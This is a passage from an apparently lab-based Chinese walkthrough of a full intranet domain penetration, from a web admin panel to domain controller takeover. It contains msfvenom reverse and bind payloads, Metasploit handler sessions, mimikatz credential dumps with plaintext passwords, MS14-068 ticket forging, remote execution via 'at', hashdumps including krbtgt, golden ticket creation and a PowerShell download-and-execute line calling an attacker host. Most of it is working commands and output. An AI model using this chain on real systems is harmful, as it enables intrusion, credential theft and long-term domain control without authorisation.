完整的内网域渗透

r = requests.session() requests.packages.urllib3.disable_warnings() rhost = r.get(h+ip,verify=False,headers=headers,timeout=5) rhost.encoding='utf-8' title = re.search('<title>(.*)</title>', rhost.text).group(1) #获取标题

info = '%s -- %s 协议： %s 数据包大小： %d 标题： %s' %

(ip,host,h,len(rhost.text),title) lists.append(info) files.write(info + "\n") print(info)

except Exception :

error = ip + " --- " + host + " --- 访问失败！~" print(error)

print("==================================== 匹配成功的列表

====================================") for i in lists:

print(i)

因为目标没用 https 协议可以只用 http 协议进行碰撞测试

admin.webhack123.com 这个就是它的后台地址

3.9.后台验证码逻辑漏洞

可以穷举密码

3.10. 设置上传文件类型拿 webshell

4.metasploit 进行提权和信息收集

4.1.生成攻击载荷

phpstudy套件是默认是系统权限的直接上传执行exe就是高权限了

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.127 lport=12345 -f exe >s.exe

4.2.监听上线

msf5 > use exploit/multi/hander

[-] No results from search

[-] Failed to load module: exploit/multi/hander msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set lhost 192.168.0.127 lhost => 192.168.0.127 msf5 exploit(multi/handler) > set lport 12345 lport => 12345

msf5 exploit(multi/handler) > exploit

权限

meterpreter > getuid

Server username: WEB\Administrator

4.3.migrate 迁移进程

migrate 迁移到64位进程里 migrate 592进行到 system 方便我们的操作

4.4.mimikatz 哈希明文获取

load mimikatz meterpreter > wdigest [+] Running as SYSTEM

[*] Retrieving wdigest credentials wdigest credentials

===================

AuthID Package Domain User Password

------ ------- ------ ---- --------

0;46514 NTLM

0;997 Negotiate NT AUTHORITY LOCAL SERVICE

0;558301 NTLM WEB Administrator !@#Qwe456

0;996 Negotiate HACKBOX

WEB$ @tB]xH/ka*ZmmIFokG1qiX#A#_ucF[yAQqI+VyKj]^NfcV9*ry"o$sfC)qN

%SA+]DvRq@htb.=_Mf;g?(N3y$:e5j[h5g#VngdcT'Ku92U TG^$cLzCnSIhw

0;999 Negotiate HACKBOX

WEB$ @tB]xH/ka*ZmmIFokG1qiX#A#_ucF[yAQqI+VyKj]^NfcV9*ry"o$sfC)qN

%SA+]DvRq@htb.=_Mf;g?(N3y$:e5j[h5g#VngdcT'Ku92U TG^$cLzCnSIhw

meterpreter > tspkg [+] Running as SYSTEM

[*] Retrieving tspkg credentials tspkg credentials

=================

AuthID	Package Domain	User Password
------	------- ------ ----	--------
0;996	Negotiate HACKBOX	WEB$
0;46514	NTLM
0;997	Negotiate NT AUTHORITY	LOCAL SERVICE
0;999	Negotiate HACKBOX	WEB$
0;558301	NTLM WEB	Administrator !@#Qwe456

看到有hackbox域用户web 本地管理员Administrator 密码 !@#Qwe456

5.跨网段域渗透

5.1.metasploit 跨网段的域渗透

这里我将用两个内网渗透神器进行域渗透下的域渗透分别是 metasploit 和 cobalt strike4.0

5.1.1.确定域环境

net config workstation

5.1.2.定位域控

run post/windows/gather/enum_domain

run post/windows/gather/enum_ad_computers

5.1.3.域信息收集

net time /domain 查看域控时间 net view 遍历信任主机 net view /domain 查看域

net view /domain:hackbox

查看域组失败其他查看组信息均失败 net group /domain

ifconfig 得到两个 ip 段

10.10.10.150 192.168.0.150

arp

5.1.4.终端设置乱码

在metasploit终端使用shell返回的信息会有乱码，可以设置编码防止乱码

chcp 65001

5.1.5.终端执行命令信息收集命令

ipconfig /all

dns 10.10.10.149

dns 一般都是与域控同一个 ip

DC	10.10.10.149
WEB	10.10.10.150

5.1.6.获取登录过的用户信息

run post/windows/gather/enum_logged_on_users

5.1.7.添加路由渗透 DC 域控

run autoroute -s 10.10.10.0/24

5.1.8.开启代理

use auxiliary/server/socks4a

5.1.9.设置 porychanins 代理 nmap 扫描

proxychains nmap -sT -A -Pn

10.10.10.149

Nmap scan report for 10.10.10.149 Host is up (0.98s latency).

Not shown: 982 closed ports

PORT	STATE SERVICE
53/tcp	open	domain
88/tcp	open	kerberos-sec
135/tcp	open	msrpc
139/tcp	open	netbios-ssn
389/tcp	open	ldap
445/tcp	open	microsoft-ds
464/tcp	open	kpasswd5
593/tcp	open	http-rpc-epmap
636/tcp	open	ldapssl
3268/tcp	open	globalcatLDAP
3269/tcp	open	globalcatLDAPssl
49152/tcp open		unknown
49153/tcp open		unknown
49154/tcp open		unknown
49156/tcp open		unknown
49157/tcp open		unknown
49158/tcp open		unknown
49163/tcp open		unknown

5.1.10. 永恒之蓝 ms17_010 进行溢出

溢出失败

5.1.11. ms14-068 的条件

使用这个 exp 需要一个普通域控用户 web 是域用户但是不知道密码

5.1.12. 开启远程桌面

run post/windows/manage/enable_rdp rdesktop 192.168.0.150

密码应该是对的但不是远程组而已

5.1.13. ms14-068 提权域控

5.1.13.1. ms14-068.exe 创建票据

这些信息从 metasploit 前期信息来的，可以翻到上面查看

ms14-068.exe -u web@hackbox.com -s

S-1-5-21-2005268815-658469957-1189185684-1103 -d 10.10.10.149 -p !@#Qwe456

5.1.13.2. 载入 kiwi

load kiwi

5.1.13.3. 清理票据

kerberos_ticket_purge 清理票据

5.1.13.4. 导入票据

在 metasploit mimikatz 好似没有这个功能。

上传 mimikatz 注入票据

mimikatz # kerberos::ptc TGT_web@hackbox.com.ccache

exit

klist 查看当前票据

访问 dc 域控

5.1.14. 获取 dc 域控权限

5.1.14.1. 生成正向载荷

msfvenom -p windows/meterpreter/bind_tcp lport=13777 -f exe >`pwd`/bind.exe

5.1.14.2. copy 复制到域控

c:\phpstudy_pro\WWW\www.webhack123.com>copy bind.exe \\dc\C$\ copy bind.exe \\dc\C$\ 1 file(s) copied.

5.1.14.3. at 执行任务运行 exe

c:\phpstudy_pro\WWW\www.webhack123.com>at at

There are no entries in the list.

c:\phpstudy_pro\WWW\www.webhack123.com>at \\dc at \\dc

There are no entries in the list.

c:\phpstudy_pro\WWW\www.webhack123.com>net time \\dc net time \\dc

Current time at \\dc is 2020/6/21 23:53:07 The command completed successfully.

c:\phpstudy_pro\WWW\www.webhack123.com>at \\dc 23:55:00 c:/bind.exe at \\dc 23:55:00 c:/bind.exe

Added a new job with job ID = 1

5.1.14.4. 获取域控权限命令

复制文件到目标

copy bind.exe \\dc\C$\ 查询 dc 时间 net time \\dc 增加任务执行

at \\dc 23:55:00 c:/bind.exe

连接域控

use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/meterpreter/bind_tcp payload => windows/meterpreter/bind_tcp msf5 exploit(multi/handler) > set rhost 10.10.10.149 rhost => 10.10.10.149 msf5 exploit(multi/handler) > set lport 13777 lport => 13777 msf5 exploit(multi/handler) > exploit

5.1.15. 获取 dc 域控哈希明文

迁移进程

migrate 388 meterpreter > run hashdump

[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.

[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...] [*] Obtaining the boot key...

[*] Calculating the hboot key using SYSKEY 36ce7093f2a02644f802d363ec425289...

/usr/share/metasploit-framework/lib/rex/script/base.rb:134: warning: constant

OpenSSL::Cipher::Cipher is deprecated [*] Obtaining the user list and keys...

[*] Decrypting user keys...

/usr/share/metasploit-framework/lib/rex/script/base.rb:268: warning: constant

OpenSSL::Cipher::Cipher is deprecated

/usr/share/metasploit-framework/lib/rex/script/base.rb:272: warning: constant

OpenSSL::Cipher::Cipher is deprecated

/usr/share/metasploit-framework/lib/rex/script/base.rb:279: warning: constant

OpenSSL::Cipher::Cipher is deprecated [*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...

Administrator:500:aad3b435b51404eeaad3b435b51404ee:2cbe963d0d877c8cc7d09c936f 1c3b33:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::

load mimikatz tspkg

5.1.16. 抓域控全部 hash

run post/windows/gather/smart_hashdump

[+] Administrator:500:aad3b435b51404eeaad3b435b51404ee:2cbe963d0d877c8cc7d09c936f1c3b33

[+] krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6f60ace6accbcb76078ccc0312174e98

[+] web:1103:aad3b435b51404eeaad3b435b51404ee:086a0bb1ed4ec72250760ea531bf8074

[+] DC$:1000:aad3b435b51404eeaad3b435b51404ee:35038905f0fcf79eca3d8fff28f94f87

[+] WEB$:1104:aad3b435b51404eeaad3b435b51404ee:fd0c8f5bc45e86c9ca5c8a289

5.1.17. 制作黄金票据

考虑长期权维护，还是做一个黄金票据比较保险。

5.1.18. 获取 ntml sid rid

wmic useraccount where name="krbtgt" get sid

5.1.19. 窃取域控超级管理权限

系统权限没办法做dcsync 所以切换域管理权限

steal_token 2812 dcsync_ntlm krbtgt

5.1.20. 生成黄金票据

golden_ticket_create -d <域名> -u <任意用户名> -s <Domain SID> -k <krbtgt NTLM Hash> -t <ticket 本地存储路径如:/tmp/krbtgt.ticket>

golden_ticket_create -d hackbox.com -u moonsec -s S-1-5-21-2005268815-658469957-1189185684 -k

6f60ace6accbcb76078ccc0312174e98 -t /tmp/krbtgt.ticket

5.1.21. 注入黄金票据

切换到 web 服务器把凭据都清理掉

kerberos_ticket_use /tmp/test.ticket dir \\dc\c$

5.2.cobaltstrike 进行内网域渗透

5.2.1.建立 teamserver

./teamserver 192.168.0.127 4477

设置好监听器

5.2.2.在 web 服务器上执行下载 poershell 恶意代码

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.0.127:80/a'))"

5.2.3.设置间隔时间

进入 beacon

设置间隔时间 sleep 0 不然会影响后面的操作

5.2.4.获取 hash 获取域内信任主机

5.2.5.扫描域内主机

5.2.6.cs 里面集合了很多 net 命令

可以使用这些命令，方便快捷收集域信息

5.2.7.cobaltstrike mimikatz web 服务获取明密文

5.2.8.dir 访问域控 dc

5.2.9.cobaltstrike ms14-068 提权到域控

转换的时候出错估计是文件类型问题

5.2.9.1. 在 py 脚本下创建票据

root@kali:~/Desktop/webhack123/pykek# set +H root@kali:~/Desktop/webhack123/pykek# proxychains python ms14-068.py -u web@hackbox.com -s S-1-5-21-2005268815-658469957-1189185684-1103 -d 10.10.10.149 -p !@#Qwe456